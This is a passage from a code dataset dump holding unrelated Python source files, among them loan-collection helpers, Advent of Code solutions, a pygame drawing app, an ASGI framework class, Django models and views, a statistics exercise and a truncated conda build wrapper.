RepaymentLogR.select().where(\n        RepaymentLogR.application_id == application.id)\n    # data before Oct 2018 contains duplicates, key => application_id-repay_at\n    repayment_logs = {\"{}-{}\".format(r.application_id, r.repay_at.strftime(\n        \"%Y-%m-%d %H:%M:%S\")): r for r in repayment_logs}\n    repayment_logs = repayment_logs.values()\n    return repayment_logs\n\n\n# whether the collection IVR got through; before the case entered bomber this also has to\n# report whether the borrower was reached within 3 / 7 days before repayment\ndef calc_is_get_through_auto_ivr(application_id=None, finished_at=None):\n    result = {\"is_ivrjt\": 1,\n              \"is_brjt_bf3laf\": 0,\n              \"is_brjt_bf7laf\": 0\n              }\n    if not application_id:\n        logging.info(\n            \"calc_is_get_through_auto_ivr failed, application is none\")\n        return result\n    auto_ivr_actions = AutoIVRActions.select().where(\n        AutoIVRActions.loanid == int(application_id),\n        AutoIVRActions.callstate == 1)\n    if finished_at:\n        if isinstance(finished_at, str):\n            finished_at = datetime.datetime.strptime(finished_at,\n                                                     \"%Y-%m-%d %H:%M:%S\")\n        finished_three_days = finished_at + datetime.timedelta(days=-3)\n        finished_seven_days = finished_at + datetime.timedelta(days=-7)\n        for auto_ivr in auto_ivr_actions:\n            if auto_ivr.created_at >= finished_seven_days:\n                result[\"is_brjt_bf7laf\"] = 1\n            if auto_ivr.created_at >= finished_three_days:\n                result[\"is_brjt_bf3laf\"] = 1\n                break\n    if not auto_ivr_actions:\n        result[\"is_ivrjt\"] = 0\n    return
result\n","sub_path":"bomber/controllers/golden_eye.py","file_name":"golden_eye.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"112073908","text":"#. Count consecutive characters say example i/p: aaabcdddd o/p: 3a1b1c4d\ns=input(\"enter the input:\")\ni = 0\nwhile i < len(s):\n    # Counting occurrences of s[i]; the bounds check also keeps the last run from being skipped\n    count = 1\n    while i + 1 < len(s) and s[i] == s[i + 1]:\n        i += 1\n        count += 1\n    print(str(count) + str(s[i]),end=\" \")\n    i += 1\nprint()\n\n# Python3 code to demonstrate\n# each occurrence frequency using a dict\ndef fun():\n    text=input(\"enter the input:\")\n    freq = {}\n    for i in text:\n        if i in freq:\n            freq[i] += 1\n        else:\n            freq[i] = 1\n    print(freq)\nfun()\n","sub_path":"py_pgm/count consucative char.py.py","file_name":"count consucative char.py.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"118064936","text":"import hashlib\n\nf = open('./2015/input/aoc2015_04.txt', 'r')\n\n# strip trailing newlines so they do not end up inside the hashed string\ndata = [line.strip() for line in f.readlines()]\n\ndef check_hash(_hash, num_of_zeros):\n    if _hash.hexdigest()[:num_of_zeros] == '0'*num_of_zeros:\n        return True\n\ndef part_1(dat):\n    i = 0\n    while True:\n        i += 1\n        md5 = hashlib.md5(f\"{dat[0]}{i}\".encode('utf-8'))\n        if check_hash(md5, 5):\n            return i\n\ndef part_2(dat):\n    i = 0\n    while True:\n        i += 1\n        md5 = hashlib.md5(f\"{dat[0]}{i}\".encode('utf-8'))\n        if check_hash(md5, 6):\n            return i\n\nprint(part_1(data))\nprint(part_2(data))\n","sub_path":"2015/aoc2015_04.py","file_name":"aoc2015_04.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"164739590","text":"#!/usr/bin/python3.7\n\nfrom itertools import permutations\nfrom queue import SimpleQueue\n\nCURSOR_STEPS = {1: 4, 2: 4, 3: 2, 4: 2, 5: 3, 6: 3, 7: 4, 8: 4, 99: 1}\n\nwith open('input.txt') as f:\n    intcode = [int(x) for x in f.readline().strip().split(',')]\n\nclass Computer:\n    def __init__(self):\n        self.intcode = intcode.copy()\n        self.cursor = 0\n        self.input = SimpleQueue()\n\n    @staticmethod\n    def parse_instructions(code):\n        code = '0' * (5 - len(str(code))) + str(code)\n        op = int(code[-2:])\n        modes = [int(x) for x in code[:-2]][::-1]\n        return op, modes\n    \n    def put(self, val):\n        self.input.put(val)\n\n    def process(self):\n        \"\"\"\n        Evaluates intcode until output or halt\n        \"\"\"\n        while True:\n            intcode = self.intcode\n            opcode, modes = self.parse_instructions(intcode[self.cursor])\n\n            # The literal ints passed into the function\n            args = intcode[self.cursor : self.cursor + CURSOR_STEPS[opcode]]\n\n            # The value of the ints passed into the function\n            vals = []\n            for i in range(CURSOR_STEPS[opcode]-1):\n                if modes[i]:\n                    # literal mode\n                    vals.append(args[i + 1])\n                else:\n                    # pointer mode\n                    vals.append(intcode[args[i + 1]])\n\n            # if only python had switch ;(\n            if opcode == 99:\n                raise StopIteration\n            elif opcode == 1:\n                # addition\n                intcode[args[3]] = vals[0] + vals[1]\n            elif opcode == 2:\n                # multiplication\n                intcode[args[3]] = vals[0] * vals[1]\n            elif opcode == 3:\n                # input\n                intcode[args[1]] = self.input.get()\n            elif opcode == 4:\n                # output\n                self.cursor += 2\n                return vals[0]\n            elif opcode == 5:\n                # jump if true: test the first parameter, jump to the second\n                if vals[0] != 0:\n                    self.cursor = vals[1]\n                    continue\n            elif opcode == 6:\n                # jump if false: test the first parameter, jump to the second\n                if vals[0] == 0:\n                    self.cursor = vals[1]\n                    continue\n            elif opcode == 7:\n                # less than\n                intcode[args[3]] = 1 if vals[0] < vals[1] 
else 0\n elif opcode == 8:\n # equal to\n intcode[args[3]] = 1 if vals[0] == vals[1] else 0\n else:\n raise Exception(f'No such opcode: {opcode}')\n\n # print(f'\\nOpcode: {opcode}, Args: {args}, Modes: {modes}, Vals: {vals}, Step: {CURSOR_STEPS[opcode]}')\n # input('press any key to continue')\n self.cursor += CURSOR_STEPS[opcode]\n\ndef part1():\n max_output = float('-inf')\n for perm in permutations(range(0, 5)):\n amps = []\n for i in range(len(perm)):\n # Setup the computers\n amps.append(Computer())\n amps[i].put(perm[i])\n\n output = 0\n halt = False\n while not halt:\n for i in range(len(perm)):\n amps[i].put(output)\n try:\n output = amps[i].process()\n except StopIteration:\n halt = True\n max_output = max(output, max_output)\n print(f'Part 1: {max_output}')\n\ndef part2():\n max_output = float('-inf')\n for perm in permutations(range(5, 10)):\n amps = []\n for i in range(len(perm)):\n # Setup the computers\n amps.append(Computer())\n amps[i].put(perm[i])\n\n output = 0\n halt = False\n while not halt:\n for i in range(len(perm)):\n amps[i].put(output)\n try:\n output = amps[i].process()\n except StopIteration:\n halt = True\n max_output = max(output, max_output)\n print(f'Part 2: {max_output}')\n\n\npart1()\npart2()\n","sub_path":"2019/7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"6714037","text":"#!/usr/bin/python\n\n# How many followers do you have?\nimport urllib.request\nimport re\n\nfeeds = [\n 'centosproject',\n 'centos'\n ];\nfor feed in feeds:\n response = urllib.request.urlopen('https://twitter.com/' + feed)\n html = response.read().decode('utf-8')\n print ( feed + ': ' + re.search('.*?([\\d,]+ Followers).*', html).group(1) )\n\n","sub_path":"scripts/followers.py","file_name":"followers.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"426695443","text":"\n__author__ = 'kemele'\nimport abc\nimport json\nfrom fedsdm.rdfmt import MTManager\n\n\nclass ConfigSimpleStore(object):\n\n def __init__(self, graph, endpoint, update, user, passwd):\n self.federation = graph\n self.endpoint = endpoint\n self.update = update\n self.user = user\n self.password = passwd\n self.mgr = MTManager(endpoint, user, passwd, graph)\n self.rdfmts = {}\n self.predidx = {}\n self.predidx = {}\n\n def createPredicateIndex(self):\n pidx = {}\n for m in self.rdfmts:\n preds = self.rdfmts[m]['predicates']\n for p in preds:\n if p['predicate'] not in pidx:\n pidx[p['predicate']] = set()\n pidx[p['predicate']].add(m)\n else:\n pidx[p['predicate']].add(m)\n\n return pidx\n\n def findbypreds(self, preds):\n res = []\n if len(self.predidx) == 0:\n self.predidx = self.mgr.get_preds_mt()\n for p in preds:\n if p in self.predidx:\n res.append(self.predidx[p])\n if len(res) != len(preds):\n return {}\n for r in res[1:]:\n res[0] = set(res[0]).intersection(set(r))\n if len(res) > 0:\n mols = list(res[0])\n return {m: self.mgr.get_rdfmt(m) for m in mols}\n else:\n return {}\n\n def find_rdfmt_by_preds(self, preds):\n if len(self.rdfmts) > 0:\n return self.findbypred(preds)\n res = self.mgr.get_rdfmts_by_preds(preds)\n return res\n\n def findbypred(self, pred):\n res = self.mgr.get_rdfmts_by_preds([pred])\n return res.keys()\n\n def findMolecule(self, molecule):\n if molecule in self.rdfmts:\n return self.rdfmts[molecule]\n rdfmt = self.mgr.get_rdfmt(molecule)\n return rdfmt\n\n def 
load_rdfmt(self, rdfclass):\n if rdfclass in self.rdfmts:\n return self.rdfmts[rdfclass]\n rdfmt = self.mgr.get_rdfmt(rdfclass)\n return rdfmt\n\n # def findMolecules(self, preds):\n","sub_path":"fedsdm/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"504650436","text":"import json\n\nfrom util import listToJson\n\nif __name__ == '__main__':\n courses: list = json.load(open('_pawsCourse.raw.json', 'r'))\n\n scheduleTypes = set()\n for course in courses:\n scheduleTypes.update(course['scheduleTypes'])\n\n scheduleTypes = list(scheduleTypes)\n\n listToJson(scheduleTypes, 'scheduleType')\n","sub_path":"scheduleType.py","file_name":"scheduleType.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"630491993","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n\n\"\"\"\n\nDescription: This package reads variables\n and creates basic truth tables.\n Used in app.py.\n\nAuthor: Fenz Daniel\n\nDate: 29.10.2015\n\"\"\"\n\n\n# -------------------------- functions -----------------------------\n\ndef createTruthTable(variables):\n truthTable_dict = {} # Final product of this function, storing the truth table\n # In the end will look something like this:\n # {a : [True, True, False, False], b : [True, False, True, False]}\n\n boolean = True # This will get added to the truth table and switch between True & False\n index = 0 # Marks which of the tables gets worked on\n count = len(variables)\n valuesCount = 2 ** count # How many values there will be per variable\n\n for i in range(count, 0, -1): # Runs in reverse because this works backwards\n # to simulate how truth tables are created normally\n\n switch = (2 ** i) // 2 # Switch marks after how many additions to an truth list of a variable\n # the programm needs to switch bool value\n\n for iteration in range(1, valuesCount + 1):\n if variables[index] in truthTable_dict:\n truthTable_dict[variables[index]].append(boolean)\n else:\n truthTable_dict[variables[index]] = [boolean]\n\n if iteration % switch == 0:\n boolean = not boolean\n index += 1 # index runs with the highest for-loop, because that loop runs backwards\n\n return truthTable_dict\n\n\n\n","sub_path":"src/create_truth_table.py","file_name":"create_truth_table.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"554507762","text":"\"\"\"Basic Drawing Program\"\"\"\n\n\n# import pygame library so we can use it!\nimport pygame\n\n# run initialization code on the library\npygame.init()\n\n# setup display dimensions\ndisplay_width = 1000\ndisplay_height = 1000\n\ngameSurface = pygame.display.set_mode((display_width, display_height))\n# pygame.display.set_caption('Window Caption!')\n\n# setup game resources\n# color definitions\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGRAY = (240, 240, 240)\nRED = (200, 0, 0)\nGREEN = (0, 200, 0)\nBLUE = (0, 0, 200)\n\n# variables\n# current mouse position and previouse mouse position\nmouseX = 0\nmouseY = 0\npMouseX = 0\npMouseY = 0\n# size variable for drawing tool\nsize = 10\n# Array of colors we can switch between\ncolorArray = [RED, GREEN, BLUE, WHITE]\ncolorNum = 0\n\n# set background once at the beginning\ngameSurface.fill(WHITE)\n\n# main game loop\nrunning = True # when running is True game loop will run\nwhile running 
== True:\n\n    # fill entire screen (clear background)\n    # gameSurface.fill(WHITE)\n\n    # get input events and respond to them\n    # if event is .QUIT\n    for event in pygame.event.get():\n        print(event)\n        if event.type == pygame.QUIT:\n            running = False\n\n        # handle input events\n        elif event.type == pygame.KEYDOWN:\n            # clear screen\n            if event.key == pygame.K_SPACE:\n                gameSurface.fill(WHITE)\n            # change colors\n            if event.key == pygame.K_1:\n                colorNum = 0\n            if event.key == pygame.K_2:\n                colorNum = 1\n            if event.key == pygame.K_3:\n                colorNum = 2\n            if event.key == pygame.K_0:\n                colorNum = 3\n            # change size of circles\n            if event.key == pygame.K_MINUS:\n                size -= 1\n                if size < 1:\n                    size = 1\n            if event.key == pygame.K_EQUALS: # really the + key without shift\n                size += 1\n\n    # print(pygame.mouse.get_pos()) #print mouse position to console\n\n    # this needs to constantly update so move out of mouse if statement\n    pmouseX, pmouseY = pygame.mouse.get_rel()\n    mouseX, mouseY = pygame.mouse.get_pos()\n\n    # use state checking to determine if mouse is pressed every frame\n    # if the left button is pressed, draw a line from the previous position\n    if pygame.mouse.get_pressed() == (1, 0, 0):\n        # pygame.draw.circle(gameSurface, colorArray[colorNum], (mouseX, mouseY), size)\n        # pmouseX,pmouseY = pygame.mouse.get_rel() # this needs to constantly update so move out of mouse if statement\n        pygame.draw.line(gameSurface, colorArray[colorNum], (mouseX - pmouseX, mouseY - pmouseY), (mouseX, mouseY),\n                         size)\n        # pygame.draw.circle(gameSurface, colorArray[colorNum], (mouseX, mouseY), size)\n    # if the right button is pressed\n    if pygame.mouse.get_pressed() == (0, 0, 1):\n        pygame.draw.circle(gameSurface, colorArray[colorNum], (mouseX, mouseY), size)\n\n    # update and redraw entire screen\n    pygame.display.flip()\n    # update some of the screen\n    # pygame.display.update()\n","sub_path":"Extras/Old Class Files/pygame/pygame4Drawing.py","file_name":"pygame4Drawing.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"439300013","text":"#coding:utf-8\nimport unittest\nimport re\nimport json\nimport HTMLTestRunner\nfrom demo1 import RunMain\nclass TestMethod(unittest.TestCase):\n    u'''demo'''\n    def setUp(self):\n        self.run = RunMain()\n    def test_01(self):\n        u'''verification-code login endpoint'''\n        host = \"http://192.168.1.238:9998\"\n        url = host+\"/poipoi/users/login/phone\"\n        headers = {\n            'Content-Type':'application/json',\n            \"Accept\": \"*/*\"\n        }\n        body = {\n            \"deviceType\": 1,\n            \"phone\": \"12000000001\",\n            \"verifyCode\": \"120000\"\n        }\n        res = self.run.run_main('POST',url,headers,body)\n        # print(res)\n        self.assertEqual(res.json()['status'],200,'test failed')\n        # globals()['name'] = value registers a global variable\n        globals()['userId']=re.findall('\"userId\":(.+?),',res.text)[0]\n        globals()['token']=re.findall('\"token\":\"(.+?)\"',res.text)[0]\n        # print(userId,token)\n    # @unittest.skip('test_02') # skip this case\n    def test_02(self):\n        u'''personal info endpoint'''\n        host = \"http://192.168.1.238:9998\"\n        url = host+\"/poipoi/users/info\"\n        headers = {\n            'Content-Type':'application/json',\n            \"Accept\": \"*/*\",\n            'userId':userId,\n            'token':token\n        }\n        res = self.run.run_main('GET',url,headers)\n        # print(res.text)\n        # print(res.content.decode(\"UTF-8\"))\n        self.assertEqual(res.json()['status'],200,'test failed')\nif __name__ == \"__main__\":\n    # unittest.main()\n\n    # report output path\n    filepath = \"C:\\\\wsl\\\\AutoTest\\\\\\\\auto_python2\\\\report\\\\html_report.html\"\n    fp = open(filepath,'wb')\n    # build a suite and run it\n    suite = unittest.TestSuite()\n
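    # NOTE: test_02 reads the module-level globals (userId, token) that test_01 registers,\n    # so the cases are added to the suite in this explicit order below rather than relying\n    # on unittest's default alphabetical sorting of test names.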
    suite.addTest(TestMethod('test_01'))\n    suite.addTest(TestMethod('test_02'))\n    # unittest.TextTestRunner().run(suite)\n    runner = HTMLTestRunner.HTMLTestRunner(fp,verbosity=2,title=\"API test report\",description=\"demo_POI API test report\")\n    runner.run(suite)\n\n\n'''\nunittest interview notes:\n1. How do you build a test framework in Python?\n- use the requests package\n- the unittest framework: assertions and checks, skipping cases, dependencies, selecting the cases to run\n- generate test reports with HtmlTestRunner\n- store the data in spreadsheets or a database\n- integrate with git + jenkins\n2. How do you manage cases?\n- the unittest framework: assertions and checks, skipping cases, dependencies, selecting the cases to run\n- manage them in Excel\n3. Describe the order in which cases execute\nsetUp\ntearDown\nsetUpClass\ntearDownClass\ntest_01\ntest_02\n4. How do you handle dependencies between cases?\n- register globals: extract the value with a regular expression or a reference and expose it with globals()['name'] = value,\nor store it in a database / config file\n5. How do you generate a test report?\nDownload the HtmlTestRunner file and place it under the lib directory of the Python install;\ncombine it with unittest, set the report path, and write out the report\n'''","sub_path":"auto_python2/base/test_method2.py","file_name":"test_method2.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"119930729","text":"from . import router, structure\nimport logging\n\n\nclass App:\n    '''\n    The App class is used as the app.\n\n    It will be used for all activities.\n    This requires a `Router` to be attached for serving responses accordingly.\n    The __call__ function has the ASGI app.\n    '''\n\n    def __init__(\n        self,\n        router: router.Router,\n        response: structure.Response = structure.Response()\n    ):\n        def startup():\n            pass\n\n        def shutdown():\n            pass\n\n        self.config = {\n            \"startup\": startup,\n            \"shutdown\": shutdown,\n            \"logger\": logging.debug,\n            \"router_config\": {\n                \"logger_exception\": logging.error,\n                \"logger_info\": logging.info,\n                \"404Response\": structure.Response404(),\n                \"405Response\": structure.Response405(),\n                \"500Response\": structure.Response500()\n            },\n        }\n        self.router = router\n        router.config = self.config[\"router_config\"]\n        self.response = response\n\n# Websocket implementation yet to do.\n    async def __call__(self, scope, receive, send):\n        '''This will be serving as the ASGI app.\n        The information about the request is taken from the `scope` argument and the response is sent with `send`.\n\n        Args:\n            self: The App class\n            scope: The `scope` to communicate as per the ASGI specification.\n            receive: ASGI receive function\n            send: ASGI send function\n        '''\n# HTTP\n        if scope[\"type\"] == \"http\":\n            body = b''\n            if scope[\"method\"] in self.router.bodied_methods:\n                more_body = True\n                while more_body:\n                    message = await receive()\n                    body += message.get(\"body\", b\"\")\n                    more_body = message.get(\"more_body\", False)\n\n            response_ = await self.router.handle(\n                structure.Request(\n                    method=scope[\"method\"],\n                    path=scope[\"path\"],\n                    headers=scope[\"headers\"],\n                    raw_query=scope[\"query_string\"],\n                    raw_body=body\n                ),\n                self.response)\n\n            # '... is not dict()' was always true; only build cookie headers when cookies exist\n            if response_.cookies:\n                response_cookies = [\n                    [\n                        b'Set-Cookie',\n                        cookie_.encode() + b'=' +\n                        response_.cookies[cookie_].cookie_str\n                    ]\n                    for cookie_ in response_.cookies.keys()]\n            else:\n                response_cookies = []\n            await send({\n                'type': 'http.response.start',\n                'status': response_.status,\n                'headers': [\n                    [value.encode() for value in header_pair] for header_pair in list(response_.headers.items())\n                ] + response_cookies\n            })\n\n            await send({\n                'type': 'http.response.body',\n                'body': response_.body.encode()\n            })\n# End HTTP\n# lifespan\n        elif scope[\"type\"] == \"lifespan\":\n            while True:\n                message = await receive()\n                if message['type'] == 'lifespan.startup':\n                    self.config[\"startup\"]()\n                    await send({'type': 'lifespan.startup.complete'})\n                elif message['type'] == 'lifespan.shutdown':\n
self.config[\"shutdown\"]()\n await send({'type': 'lifespan.shutdown.complete'})\n return\n# End lifespan\n# WebSocket\n\n# Not implemented yet.\n\n# End WebSocket\n","sub_path":"willpyre/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"165875605","text":"from django.shortcuts import render\r\n\r\nfrom article.forms import ArticleForm\r\nfrom article.models import Article, Comment\r\n\r\n\r\ndef article(request):\r\n \"\"\"\r\n Render the page\r\n \"\"\"\r\n articles = {} \r\n for article in Article.objects.all():\r\n articles.update({article:Comment.objects.filter(article=article)})\r\n context = {'articles':articles} #利用範本變數articles將查詢結果傳至範本\r\n \r\n return render(request, 'article/article.html', context)\r\n# Create your views here.\r\n\r\n\r\ndef articleCreate(request):\r\n \"\"\"\r\n Create a new article instance\r\n 1. if method is GET, render an empty form\r\n 2. if methond is POST, perform form validation and display error messages if the form is invalid\r\n 3. save the form to the model and redirect the user to the aritcle page\r\n \"\"\"\r\n template = 'article/articleCreate.html'\r\n print(ArticleForm())\r\n if request.method =='GET':\r\n return render(request, template, {'articleForm':1234})\r\n \r\n \r\n \r\n \r\n ","sub_path":"financial/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"74548569","text":"# function for octal no. at decimal place\r\ndef OctalToDecimal(octal):\r\n\r\n octal1 = octal\r\n decimal, i, n = 0, 0, 0\r\n while(octal != 0):\r\n dec = octal % 10\r\n decimal = decimal + dec * (8**i)\r\n octal = octal//10\r\n i += 1\r\n print(decimal)\r\n\r\n# function for octal no. at fractional place\r\n\r\n\r\ndef OctalToDecimal1(octal1):\r\n # Python Program to Reverse a Number using While loop\r\n\r\n Reverse = 0\r\n while(octal1 > 0):\r\n Reminder = octal1 % 10\r\n Reverse = (Reverse * 10) + Reminder\r\n octal1 = octal1 // 10\r\n\r\n decimal, i, n = 0, 1, 0\r\n while(Reverse != 0):\r\n dec = Reverse % 10\r\n decimal = decimal + dec * (8**-i)\r\n Reverse = Reverse//10\r\n i += 1\r\n print(decimal)\r\n\r\n# taking value of octal no. at decimal place\r\n\r\n\r\noctal = int(input(\"Enter the octal no.\"))\r\n\r\n# function call\r\nOctalToDecimal(octal)\r\n\r\n# taking value of octal no. after fraction place\r\noctal1 = float(input(\"Enter the octal no. 
after the decimal place\"))\r\n\r\n# function call\r\nOctalToDecimal1(octal1)\r\n","sub_path":"Conversion/OctalToDecimal.py","file_name":"OctalToDecimal.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"90504262","text":"from atm_list_class import ATM\n\n\n\nbalance1 = 500\nbalance2 = 1000\nbalance3 = 20000\n\natm1 = ATM(balance1, \"Smart Bank\")\natm2 = ATM(balance2, \"Baraka Bank\")\natm3 = ATM(balance3, \"Cairo Bank\")\n\natm1.withdraw(600)\natm1.withdraw(200)\natm1.withdraw(23)\natm1.withdraw(50)\n\natm2.withdraw(50)\natm2.withdraw(70)\natm2.withdraw(30)\natm2.withdraw(100)\n\natm3.withdraw(533)\natm3.withdraw(100)\natm3.withdraw(499)\natm3.withdraw(600)\n\natm1.show_withdrawls()\natm2.show_withdrawls()\natm3.show_withdrawls()","sub_path":"atm solution/atmlist/atm_list_teast.py","file_name":"atm_list_teast.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"583952085","text":"\"\"\"\nEXERCISE:\n1) Read in the 'hour.csv' file\n2) Run the regression with: cnt ~ temp + hum + workingday + hour + C(weathersit)\n3) Evaluate the results, how does this compare with the day \n3) Create a binary variable for rush hour defined by 6-9a & 4-6p\n4) Run the regression again. Does this new variable improve the results?\n\"\"\"\nimport pandas as pd\nimport statsmodels.formula.api as smf\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport numpy as np\n# 1\nbike_dat = pd.read_csv(\"hours.csv\")\nbike_dat.head()\nlen(bike_dat)\n\"\"\"\n weathersit : \n- 1: Clear, Few clouds, Partly cloudy, Partly cloudy \n- 2: Mist + Cloudy, Mist + Broken clouds, Mist + Few clouds, Mist \n- 3: Light Snow, Light Rain + Thunderstorm + Scattered clouds, Light Rain + Scattered clouds \n- 4: Heavy Rain + Ice Pallets + Thunderstorm + Mist, Snow + Fog \n\"\"\"\n\n#2 and 3\nhours_lm = smf.ols(formula='cnt ~ temp + hum + workingday + hr + C(weathersit)', data=bike_dat).fit()\nhours_lm.summary()\n##R-squared is only .328, the weathersit[T.4] is not significant\n##all other variables' CI do not include 0\n\n\n\nbike_dat_days = pd.read_csv(\"days.csv\")\nbike_dat_days.head()\nlen(bike_dat_days)\ndays_lm = smf.ols(formula='cnt ~ temp + hum + workingday + C(weathersit)', data=bike_dat_days).fit()\ndays_lm.summary()\n\n##R-squared is higher for the daily model\n## workingday is not significant if p is 5%\n\nbike_dat['hr'].describe() #values take on 0 23\nbike_dat['rushhour']=bike_dat['hr'].apply(lambda x: 1 if (x>=6 and x<=8) or (x>=16 and x<=18) else 0)\n#[1 if (bike_dat['hr']>=6 & bike_dat['hr']<=8) | (bike_dat['hr']>=16 & bike_dat['hr']<=18) else 0 for row in bike_dat]\n\nrush_lm = smf.ols(formula='cnt ~ temp + hum + workingday + rushhour + C(weathersit)', data=bike_dat).fit()\nrush_lm.summary()\n##this variable does improve results but the binary varialbes for weathersit are not significant\nrush_lm_2 = smf.ols(formula='cnt ~ temp + hum + workingday + rushhour', data=bike_dat).fit()\nrush_lm_2.summary()\n##removing did not increase R squared\n##how do you remove just one/two of the C(weathersit) variables\n","sub_path":"christine/Hmwk 10282014/october28hmwk.py","file_name":"october28hmwk.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"430514376","text":"from django.db import models\nfrom django.db.models.deletion import 
CASCADE\nfrom django.db.models.fields import related\n\n\nclass Pet_page(models.Model):\n # user_id = models.ForeignKey\n user_id = models.IntegerField()\n title = models.CharField(max_length=50)\n\n\n# Create your models here.\nclass Pet(models.Model):\n # user_id = models.ForeignKey\n user_id = models.IntegerField()\n pet_page_id = models.ForeignKey(Pet_page, on_delete=CASCADE, related_name='pets')\n pet_image = models.ImageField()\n name = models.CharField(max_length=30)\n birthday = models.DateField()\n voice = models.FileField()\n deathday = models.DateField()\n status = models.CharField(max_length=20)\n\n\nclass Pet_day(models.Model):\n # user_id = models.ForeignKey\n user_id = models.IntegerField()\n pet_page_id = models.ForeignKey(Pet_page, on_delete=CASCADE)\n emoticon_01 = models.IntegerField()\n emoticon_02 = models.IntegerField()\n emoticon_03 = models.IntegerField()\n emoticon_04 = models.IntegerField()\n emoticon_05 = models.IntegerField()\n\n\n","sub_path":"PetAlbum/pet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"278749954","text":"#!/usr/bin/env python\n\nimport argparse\nimport errno\nimport fnmatch\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\n\nimport conda.config\nimport conda.misc\n\nconda_meta_prefix = conda.config.default_prefix+os.sep+'conda-meta'\npackages_available = conda.misc.walk_prefix(conda_meta_prefix)\npackage_by_name={}\nfor pack in packages_available:\n package_by_name[pack.rsplit('-',2)[0]]=pack\n\ndef read_deps(package):\n if package not in package_by_name:\n return []\n with open(conda_meta_prefix+os.sep+package_by_name[package]) as f:\n import json\n j = json.load(f)\n depends = j['depends']\n # these have version information too\n # for now, assume that the only versions in the prefix have been pulled in for me\n # and no other versions exist\n depends = [j.split(' ')[0] for j in depends]\n return depends\n\n# TODO (very far future): support multiple package lists\ndef resolve_dependencies(packages):\n # do a BFS for dependencies\n this_layer = packages\n next_layer = []\n found = []\n while this_layer:\n for pack in this_layer:\n if pack in found:\n continue\n found.append(pack)\n dep = read_deps(pack)\n if dep is not None:\n next_layer += dep\n this_layer = next_layer\n next_layer = []\n return found\n\n# from conda/cli/main_package.py\ndef list_package_jars(pkg_name=None):\n import os\n import re\n import conda.config as config\n from conda.misc import walk_prefix\n\n if pkg_name.endswith('.jar'):\n return [os.path.abspath(pkg_name)]\n\n pkgs_dirs = config.pkgs_dir_from_envs_dir(conda.config.envs_dirs[0])#config.pkgs_dirs[0]\n all_dir_names = []\n pattern = re.compile(pkg_name, re.I)\n\n print('\\nINFO: The location for available packages: %s' % (pkgs_dirs))\n\n for dir in os.listdir(pkgs_dirs):\n ignore_dirs = [ '_cache-0.0-x0', 'cache' ]\n\n if dir in ignore_dirs:\n continue\n\n if not os.path.isfile(pkgs_dirs+os.sep+dir):\n match = pattern.match(dir)\n\n if match:\n all_dir_names.append(dir)\n\n num_of_all_dir_names = len(all_dir_names)\n dir_num_width = len(str(num_of_all_dir_names))\n\n if num_of_all_dir_names == 0:\n print(\"\\n\\tWARN: There is NO '%s' package.\\n\" % (pkg_name))\n return 1\n elif num_of_all_dir_names >= 2:\n print(\"\\n\\tWARN: Ambiguous package name ('%s')\\n\" % (pkg_name))\n\n full_pkg_name = all_dir_names[0]\n pkg_dir = 
pkgs_dirs+os.sep+full_pkg_name\n ret = walk_prefix(pkg_dir, ignore_predefined_files=False)\n return [pkg_dir + os.sep + i for i in ret if i.endswith('.jar')]\n\n\ndef copy_dir(src, dst):\n \"\"\"Copies the contents of the directory src and places them in an already\n existing directory dst.\"\"\"\n assert os.path.exists(src)\n assert os.path.exists(dst)\n\n for filename in os.listdir(src):\n try:\n # TODO: check and ensure dst does not exist?\n shutil.copytree(os.path.join(src, filename),\n os.path.join(dst, filename))\n except OSError as e:\n if e.errno == errno.ENOTDIR:\n shutil.copy(os.path.join(src, filename),\n os.path.join(dst, filename))\n else:\n raise e\n\ndef main(args=None):\n if args is None:\n args = sys.argv[1:]\n\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger(__name__)\n\n parser = argparse.ArgumentParser(description=\"Chisel compiler wrapper script\")\n parser.add_argument('sourceDirs', nargs='+', default='src/main/scala',\n help=\"\"\"list of source directories containing Chisel code,\n scanned recursively\"\"\")\n parser.add_argument('--resourceDirs', nargs='*', 